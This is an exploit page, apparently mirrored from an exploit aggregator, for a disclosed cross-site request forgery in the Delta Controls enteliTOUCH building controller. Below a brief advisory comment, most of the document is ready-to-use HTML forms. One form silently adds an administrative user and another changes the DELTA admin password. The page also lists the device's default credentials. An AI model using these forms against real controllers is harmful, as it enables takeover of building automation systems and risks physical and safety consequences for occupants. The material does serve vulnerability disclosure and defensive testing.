Exploit for Delta Controls enteliTOUCH 3.40.3935 Cross Site Request Forgery

Name: Exploit for Delta Controls enteliTOUCH 3.40.3935 Cross Site Request Forgery
Rating: 5 (209 reviews)
2022-04-14 | CVSS 0.3
## https://sploitus.com/exploit?id=PACKETSTORM:166727
<!DOCTYPE html>  
<html>  
<head><title>enteliTouch CSRF</title></head>  
<body>  
<!--  
  
Delta Controls enteliTOUCH 3.40.3935 Cross-Site Request Forgery (CSRF)  
  
  
Vendor: Delta Controls Inc.  
Product web page: https://www.deltacontrols.com  
Affected version: 3.40.3935  
3.40.3706  
3.33.4005  
  
Summary: enteliTOUCH - Touchscreen Building Controller. Get instant  
access to the heart of your BAS. The enteliTOUCH has a 7-inch,  
high-resolution display that serves as an interface to your building.  
Use it as your primary interface for smaller facilities or as an  
on-the-spot access point for larger systems. The intuitive,  
easy-to-navigate interface gives instant access to manage your BAS.  
  
Desc: The application interface allows users to perform certain actions  
via HTTP requests without performing any validity checks to verify the  
requests. This can be exploited to perform certain actions with administrative  
privileges if a logged-in user visits a malicious web site.  
  
Tested on: DELTA enteliTOUCH  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2022-5702  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5702.php  
  
  
06.04.2022  
  
-->  
  
  
CSRF Add User:  
  
<form action="http://192.168.0.210/deltaweb/hmi_useredit.asp?formAction=Add&userName=&userPassword=" method="POST">  
<input type="hidden" name="actionName" value="" />  
<input type="hidden" name="Username" value="zsl" />  
<input type="hidden" name="Password" value="123t00t" />  
<input type="hidden" name="AutoLogout" value="17" />  
<input type="hidden" name="SS_SelectedOptionId" value="FIL28" />  
<input type="hidden" name="ObjRef" value="" />  
<input type="hidden" name="Apply" value="true" />  
<input type="hidden" name="formAction" value="Add" />  
<input type="submit" value="Go for UserAdd" />  
</form>  
  
<br />  
  
CSRF Change Admin Password (default: delta:login):  
  
<form action="http://192.168.0.210/deltaweb/hmi_useredit.asp?formAction=Edit&userName=DELTA&userPassword=baaah" method="POST">  
<input type="hidden" name="actionName" value="" />  
<input type="hidden" name="Username" value="DELTA" />  
<input type="hidden" name="Password" value="123456" />  
<input type="hidden" name="AutoLogout" value="30" />  
<input type="hidden" name="SS_SelectedOptionId" value="" />  
<input type="hidden" name="ObjRef" value="ZSL-251" />  
<input type="hidden" name="Apply" value="true" />  
<input type="hidden" name="formAction" value="Edit" />  
<input type="submit" value="Go for UserEdit" />  
</form>  
  
</body>  
</html>